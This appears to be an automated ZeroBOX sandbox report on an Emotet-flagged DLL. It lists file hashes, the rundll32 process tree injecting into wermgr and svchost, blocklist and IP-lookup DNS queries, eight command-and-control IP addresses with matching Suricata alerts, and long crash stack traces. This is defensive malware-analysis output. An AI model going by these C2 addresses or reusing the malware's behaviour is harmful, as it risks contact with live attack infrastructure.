Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Aug. 5, 2021, 9:41 a.m.	Aug. 5, 2021, 9:51 a.m.

Size	684.0KB
Type	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5	`2ab4cc984ec0b93b82c0e4bf03aa8c5f`
SHA256	`892a84154516ef80df5f1764f1629c5254795669277f5ca324a035861d774cb7`
CRC32	`9045A0E0`
ssdeep	`12288:P/0oFwB5C7k70pW2OS2QRT8hr+4gT4FpawCi0:EoFS5C6H2OSpK6wpaXi0`
Yara	PE_Header_Zero - PE File Signature IsDLL - (no description) UPX_Zero - UPX packed file IsPE32 - (no description) Malicious_Library_Zero - Malicious_Library Win32_Trojan_Emotet_1_Zero - Win32 Trojan Emotet Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet

rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\ggi8w3183a1077e104d07a84291d0d5dcc1de.dll,
2108
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\ggi8w3183a1077e104d07a84291d0d5dcc1de.dll,StartW
828
- wermgr.exe C:\Windows\system32\wermgr.exe
  2216
  - svchost.exe C:\Windows\system32\svchost.exe
    2824
  - svchost.exe C:\Windows\system32\svchost.exe
    3000
  - svchost.exe C:\Windows\system32\svchost.exe
    2212

Name	Response	Post-Analysis Lookup
150.134.208.175.b.barracudacentral.org	A 127.0.0.2	127.0.0.2
150.134.208.175.zen.spamhaus.org
api.ipify.org	A 23.21.168.151 CNAME nagano-19599.herokussl.com A 54.225.245.108 A 50.19.92.227 A 54.235.121.178 A 50.16.235.219 A 54.235.88.121 A 50.16.239.65 A 54.243.175.83 CNAME elb097307-934924932.us-east-1.elb.amazonaws.com	23.21.224.49
150.134.208.175.cbl.abuseat.org

IP Address	Status	Action
105.27.205.34	Active	Moloch
128.201.76.252	Active	Moloch
164.124.101.2	Active	Moloch
179.189.229.254	Active	Moloch
184.74.99.214	Active	Moloch
46.99.175.217	Active	Moloch
54.235.88.121	Active	Moloch
65.152.201.203	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49168 -> 105.27.205.34:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 192.168.56.102:49167 -> 46.99.175.217:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 46.99.175.217:443 -> 192.168.56.102:49167	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 105.27.205.34:443 -> 192.168.56.102:49168	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 192.168.56.102:49165 -> 46.99.175.217:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 192.168.56.102:49178 -> 105.27.205.34:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 105.27.205.34:443 -> 192.168.56.102:49178	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 46.99.175.217:443 -> 192.168.56.102:49165	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 192.168.56.102:49164 -> 179.189.229.254:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 179.189.229.254:443 -> 192.168.56.102:49164	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 192.168.56.102:49173 -> 105.27.205.34:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 105.27.205.34:443 -> 192.168.56.102:49173	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 192.168.56.102:49166 -> 54.235.88.121:80	2029622	ET POLICY External IP Lookup (ipify .org)	Potential Corporate Privacy Violation
TCP 192.168.56.102:49166 -> 54.235.88.121:80	2013028	ET POLICY curl User-Agent Outbound	Attempted Information Leak
TCP 192.168.56.102:49176 -> 65.152.201.203:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 65.152.201.203:443 -> 192.168.56.102:49176	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 192.168.56.102:49182 -> 128.201.76.252:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 128.201.76.252:443 -> 192.168.56.102:49182	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 192.168.56.102:49184 -> 184.74.99.214:443	2404309	ET CNC Feodo Tracker Reported CnC Server group 10	A Network Trojan was detected
TCP 192.168.56.102:49184 -> 184.74.99.214:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 184.74.99.214:443 -> 192.168.56.102:49184	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 192.168.56.102:49171 -> 128.201.76.252:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 128.201.76.252:443 -> 192.168.56.102:49171	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 192.168.56.102:49172 -> 128.201.76.252:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 128.201.76.252:443 -> 192.168.56.102:49172	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 192.168.56.102:49177 -> 65.152.201.203:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 65.152.201.203:443 -> 192.168.56.102:49177	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 192.168.56.102:49183 -> 184.74.99.214:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 184.74.99.214:443 -> 192.168.56.102:49183	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 192.168.56.102:49181 -> 128.201.76.252:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 128.201.76.252:443 -> 192.168.56.102:49181	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49168 105.27.205.34:443	C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd	C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd	30:21:9a:cd:06:f2:ba:20:f6:0b:3c:54:ec:08:35:d0:9d:4b:e8:50
TLSv1 192.168.56.102:49167 46.99.175.217:443	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02
TLSv1 192.168.56.102:49165 46.99.175.217:443	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02
TLSv1 192.168.56.102:49178 105.27.205.34:443	C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd	C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd	30:21:9a:cd:06:f2:ba:20:f6:0b:3c:54:ec:08:35:d0:9d:4b:e8:50
TLSv1 192.168.56.102:49164 179.189.229.254:443	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02
TLSv1 192.168.56.102:49173 105.27.205.34:443	C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd	C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd	30:21:9a:cd:06:f2:ba:20:f6:0b:3c:54:ec:08:35:d0:9d:4b:e8:50
TLSv1 192.168.56.102:49176 65.152.201.203:443	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	50:fd:fd:4e:2c:57:ea:f7:c9:cd:3f:61:4a:a2:40:01:1b:b8:df:02
TLSv1 192.168.56.102:49182 128.201.76.252:443	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02
TLSv1 192.168.56.102:49184 184.74.99.214:443	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02
TLSv1 192.168.56.102:49171 128.201.76.252:443	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02
TLSv1 192.168.56.102:49172 128.201.76.252:443	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02
TLSv1 192.168.56.102:49177 65.152.201.203:443	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	50:fd:fd:4e:2c:57:ea:f7:c9:cd:3f:61:4a:a2:40:01:1b:b8:df:02
TLSv1 192.168.56.102:49183 184.74.99.214:443	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02
TLSv1 192.168.56.102:49181 128.201.76.252:443	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Aug. 5, 2021, 9:34 a.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 5, 2021, 9:41 a.m.			0	0

The executable uses a known packer (1 event)

packer

Armadillo v1.xx - v2.xx

One or more processes crashed (6 events)

Time & API	Arguments	Status
__exception__ Aug. 5, 2021, 9:34 a.m.	stacktrace: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd hook_in_monitor+0x45 lde-0x133 @ 0x743f42ea New_kernel32_GetSystemTimeAsFileTime+0x1d New_kernel32_GetSystemWindowsDirectoryA-0x8d @ 0x7440bdb5 0xa1ad3 0x29db98 0x724134 0x29dbf0 exception.instruction_r: 48 8b 01 4a 89 44 c6 78 4d 85 e4 74 08 4b 89 8c exception.symbol: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a exception.instruction: mov rax, qword ptr [rcx] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 105050 exception.address: 0x76f99a5a registers.r14: 0 registers.r15: 2745920 registers.rcx: 0 registers.rsi: 2743192 registers.r10: 0 registers.rbx: 853676840 registers.rsp: 2743184 registers.r11: 0 registers.r8: 5 registers.r9: 1950998272 registers.rdx: 2 registers.r12: 1988766576 registers.rbp: 0 registers.rdi: 2745912 registers.rax: 1 registers.r13: 650984	1
__exception__ Aug. 5, 2021, 9:34 a.m.	stacktrace: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd hook_in_monitor+0x45 lde-0x133 @ 0x743f42ea New_ntdll_NtAllocateVirtualMemory+0x34 New_ntdll_NtClose-0x162 @ 0x7440fc86 VirtualAllocExNuma+0x66 VirtualAllocEx-0x2a kernelbase+0x33096 @ 0x7fefd503096 VirtualAllocEx+0x16 WriteProcessMemory-0x1a kernelbase+0x330d6 @ 0x7fefd5030d6 VirtualAllocEx+0x11 VerLanguageNameW-0xf kernel32+0x4bbe1 @ 0x768cbbe1 0x9b27d exception.instruction_r: 48 8b 01 4a 89 44 c6 78 4d 85 e4 74 08 4b 89 8c exception.symbol: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a exception.instruction: mov rax, qword ptr [rcx] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 105050 exception.address: 0x76f99a5a registers.r14: 853685904 registers.r15: 853882704 registers.rcx: 27 registers.rsi: 3 registers.r10: 0 registers.rbx: 2 registers.rsp: 2741144 registers.r11: -125 registers.r8: 3 registers.r9: 1951001344 registers.rdx: 3 registers.r12: 40 registers.rbp: 3 registers.rdi: 2741536 registers.rax: 4 registers.r13: 0	1
__exception__ Aug. 5, 2021, 9:35 a.m.	stacktrace: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x76fd1278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x76f99a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x768cb5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744005bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74416d97 KiUserExceptionDispatcher+0x2e 